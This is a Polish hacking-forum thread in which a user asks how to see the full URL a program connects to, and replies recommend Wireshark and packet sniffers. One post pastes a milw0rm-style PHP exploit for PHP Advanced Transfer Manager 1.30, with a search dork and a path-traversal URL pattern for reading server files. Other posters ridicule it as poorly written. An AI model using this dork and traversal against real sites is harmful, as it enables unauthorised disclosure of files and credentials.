Strona 1 z 2 12 OstatniOstatni
Pokaż wyniki 1 do 10 z 23

Temat: adres

Hybrid View

Previous Post Previous Post   Next Post Next Post
  1. #1

    Domyślnie adres

    Witam.

    Chciałbym sie dowiedzieć , jak moge wydobyć pelny adres strony www z którym łączy sie program (autoryzuje się). Ściągnąłem jakiegoś sniffera , ale on pokazuje tylko nazwe strony np. www.strona.pl , a program laczy sie w tym stylu www.strona.pl/costam.php?costam . Jest jakiś sniffer albo cos innego , co wydobedzie caly adres z tego programu?

  2. #2
    Zarejestrowany
    Jul 2007
    Skąd
    C:\Perl\bin
    Postów
    1,578

    Domyślnie

    wireshark powie ci wszystko
    War, war never changes.

  3. #3
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    Sciagnac program to nie wszystko - trzeba umiec sie nim poslugiwac. Odsylam do dokumentacji programu lub strony z ktorej go sciagnales. W ostatecznosci google.

    Praktycznie kazda aplikacja ma jakis manual - w najgorszym wypadku pare minut zabawy powinno pokazac Ci gdzie co jest, jaka opcja za co odpowiada. Polecam Wireshark'a - na prawde fajnie dziala i jest bardzo czytelny. Przyda Ci sie opcja 'Follow TCP Stream'.
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

  4. #4
    Zarejestrowany
    Apr 2008
    Postów
    200

    Domyślnie

    @sqrt
    Musisz zrobić podgląd tzw. payload czyli danych przenoszonych przez pakiety. Payload powienien zawierać ciąg znaków "GET" i następnie adres strony (zainteresuj się protokołem HTTP). Wireshark domyślnie wyświetla payload przechwyconych pakietów.

  5. #5
    Zarejestrowany
    May 2008
    Skąd
    Kielce
    Postów
    121

    Domyślnie

    smsniff Prosty i łatwy

  6. #6
    Zarejestrowany
    May 2008
    Postów
    534

    Domyślnie

    adres request, czy strone?

    srtona:
    hack.pl
    www.hack.pl


    adres:
    89.161.184.235


    request:
    hack.pl/forum/showpost.php?post=666&highlight=2354





    zrob tak:
    wireshark on>ipconfig /flush dns i snifunesz pakietow dns.
    W ten sposob bedziesz mial adresy serwerow.

  7. #7
    Zarejestrowany
    Oct 2008
    Skąd
    W Sieci !!!
    Postów
    282

    Domyślnie

    Masz od wuja...


    Przerób sobię i działaj...



    <?

    /*
    ::::::::: :::::::::: ::: ::: ::::::::::: :::
    :+: :+: :+: :+: :+: :+: :+:
    +:+ +:+ +:+ +:+ +:+ +:+ +:+
    +#+ +:+ +#++:++# +#+ +:+ +#+ +#+
    +#+ +#+ +#+ +#+ +#+ +#+ +#+
    #+# #+# #+# #+#+#+# #+# #+#
    ######### ########## ### ########### ##########
    ::::::::::: :::::::::: ::: :::: ::::
    :+: :+: :+: :+: +:+:+: :+:+:+
    +:+ +:+ +:+ +:+ +:+ +:+:+ +:+
    +#+ +#++:++# +#++:++#++: +#+ +:+ +#+
    +#+ +#+ +#+ +#+ +#+ +#+
    #+# #+# #+# #+# #+# #+#
    ### ########## ### ### ### ###

    - - [DEVIL TEAM THE BEST POLISH TEAM] - -


    Exploit Name: PHP Advanced Transfer Manager <= 1.30 Source Code Disclosure Exploit
    Script Name: PHP Advanced Transfer Manager 1.30
    Script Site: http://phpatm.free.fr/
    dork: "Powered by PHP Advanced Transfer Manager v1.30"
    Find by: Kacper (a.k.a Rahim)


    ========> DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam <========
    ========> http://www.rahim.webd.pl/ <========

    Contact: [email protected]
    -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
    Greetings DragonHeart and all DEVIL TEAM Patriots
    - Leito & Leon | friend str0ke

    Blund Coder, D0han, d3m0n, D3m0n , dn0d'e, DUREK5, fdj, Grzegorz, GrZyB997, konsol, Mandr4ke,
    mass, michalind, mIvus, Nua, nukedclx, pepi, QunZ, Qw3rty, RebeL, SkD, Adam, arkadius, asteroid, blue, Ci2u, CrazzyIwan,
    DMX, drzewko, ExTrEmE][-][ack, Gelo, Kicaj, Larry, Leito, LEON, Michas, Morpheus, MXZ, Ramzes, redsaq, TomZen

    and

    Dr Max Virus
    TamTurk,
    hackersecurity.org

    -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
    Greetings for 4ll Fusi0n Group members
    and all members of hacker.com.pl
    -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

    in folder users we dont find any file like: .htaccess so we can read all files

    http://site.gov.pl/upload/users/Admin

    Admin < username

    or you can read all files in ftp

    http://site.gov.pl/upload/viewers/ht...r=..&filename=[file]
    http://site.gov.pl/upload/viewers/ht...r=..&filename=[file]


    GAME OVER
    */
    //Settings
    $nick = "Admin";
    $glowna = "http://site.com/path/";
    $exploit = "1"; //$exploit = "0"; < exploit off
    //End Settings

    //************************************************** ************************************************** ************************************************
    if ( $exploit == "1" ) {
    $exp= "<title>PHP Advanced Transfer Manager &lt;= 1.30 Source Code Disclosure Exploit :: DEVIL TEAM :: The Best Polish Team ::</title>"
    ."<style type=\"text/css\">"
    ."body {background-color: #000000;}"
    ."body,td,th {color: #FFFFFF;}"
    .".name {font-size:11px;font-weight: bold}"
    ."</style><form method=\"get\" action=\"".$glowna."/users/".$nick."\">"
    ."<div align=\"center\"><img src=\"http://www.rahim.webd.pl/index_r2_c3.jpg\"></div>"
    ."<p align=\"center\">script url:<br>"
    ."<input type=\"text\" name=\"glowna\" size=\"90\" value=\"".$glowna."\">"
    ."<br>"
    ."Admin nick:<br>"
    ."<input name=\"nick\" type=\"text\" value=\"".$nick."\" size=\"90\"".$nick."\">"
    ."<br>"
    ."<input type=\"submit\" value=\"Exploit\" name=\"submit\">"
    ."</p>"
    ."<p align=\"center\">Find by: <a href=\"mailto:[email protected]\">Kacper</a> (a.k.a <a href=\"mailto:[email protected]\">Rahim</a>)<br>"
    ."<br>"
    ."DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam<br>"
    ."<br>"
    ."Contact: <a href=\"mailto:[email protected]\">kacper1964@yah oo.pl</a><br>"
    ."or</p>"
    ."<p align=\"center\"> <a href=\"http://www.rahim.webd.pl\">http://www.rahim.webd.pl/</a></p>"
    ."<p align=\"center\" class=\"name\">&nbsp;</p>"
    ."<HR WIDTH=\"650\" ALIGN=\"center\">"
    ."<p align=\"center\"> Z Dedykacja dla osoby,<br>"
    ."bez ktorej nie mogl bym zyc...<br>"
    ."K.C:* J.M (a.k.a Magaja)</p>"
    ."<p align=\"center\"> Special Greetz: DragonHeart ;-)<br>"
    ."Ema: Leito, Leon, Adam, DeathSpeed, Drzewko, pepi, mivus<br>"
    ."SkD, nukedclx, Ramzes<br>"
    ."<br>"
    ."Greetz for all users DEVIL TEAM IRC Channel !!<br>"
    ."!@ Przyjazni nie da sie zamienic na marne korzysci @!</p>"
    ."<HR WIDTH=\"650\" ALIGN=\"center\">"
    ."<p align=\"center\">&nbsp; </p>"
    ."</form>";
    print $exp;
    }
    ?>

    # milw0rm.com [2006-12-20]

    Wklejam caly dla marudnych.Mam tylko na tyle czasu by to wklejic...

    Stary ale jary

    Chyba wiesz gdzie poczatek ?
    A jak nie poradzisz wujek poradzi...

    Przyda Ci sie ;> Chociaz na wzor
    Ostatnio edytowane przez Mandr4ke : 11-09-2008 - 15:45
    "Wszystkie komputery PC są kompatybilne, ale niektóre są kompatybilniejsze od innych... Twój jest zawsze mniej kompatybilny..."

  8. #8
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    Hehe Mandr4ke... a co by tak gdyby tak... tak jak z phish'em robia :-)
    ... czyli sprzedaja toolkit a w kodzie jest jak wol, ze kopia danych idzie do nich
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

  9. #9
    Zarejestrowany
    Apr 2008
    Postów
    200

    Domyślnie

    Autorowi tego śmiesznego "exploita" sugeruję, aby trochę poczytał o tym jak poprawnie programować w PHP.

  10. #10
    Zarejestrowany
    Jul 2007
    Skąd
    C:\Perl\bin
    Postów
    1,578

    Domyślnie

    Cytat Napisał elceef Zobacz post
    Autorowi tego śmiesznego "exploita" sugeruję, aby trochę poczytał o tym jak poprawnie programować w PHP.
    wiesz co? to samo mi na mysl przyszlo :>
    War, war never changes.

Strona 1 z 2 12 OstatniOstatni

Podobne wątki

  1. adres ip
    By klop182 in forum TCP/IP/Analiza/Badanie
    Odpowiedzi: 4
    Autor: 05-04-2008, 22:37
  2. adres IP
    By SDM in forum TCP/IP/Analiza/Badanie
    Odpowiedzi: 14
    Autor: 07-26-2007, 11:04
  3. adres MAC liveboxa
    By michalski007 in forum Hacking
    Odpowiedzi: 17
    Autor: 05-18-2007, 20:10
  4. adres Mac
    By beti in forum Hacking
    Odpowiedzi: 16
    Autor: 05-10-2007, 18:32
  5. chodzi o adres ip
    By ironwall in forum Newbie - dla początkujących!
    Odpowiedzi: 3
    Autor: 01-21-2007, 21:18

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj